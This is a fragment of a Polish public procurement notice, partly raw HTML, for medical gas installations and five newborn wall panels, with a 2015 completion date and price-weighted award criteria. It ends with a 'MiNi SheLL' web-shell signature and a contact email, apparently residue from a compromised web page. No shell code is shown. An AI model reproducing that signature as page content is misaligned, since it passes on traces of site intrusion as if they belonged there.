Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie instalacji gazów medycznych wraz z projektem wykonawczym z uwzględnieniem wymogów normowych i Dyrektywą wyroby medyczne 93.43.EWG.P w  nawiązaniu do opracowań projektowych i robót wykonywanych przez GW wykonującego prace w  przedmiotowym zadaniu  z wyłączeniem I piętra i łącznika. W zakres zamówienia włącza się również dostawę i montaż 5 szt. paneli ściennych dla noworodków zgodnie z opisem w załączniku nr 1 do Zadania 6.
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 6 niniejszej SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com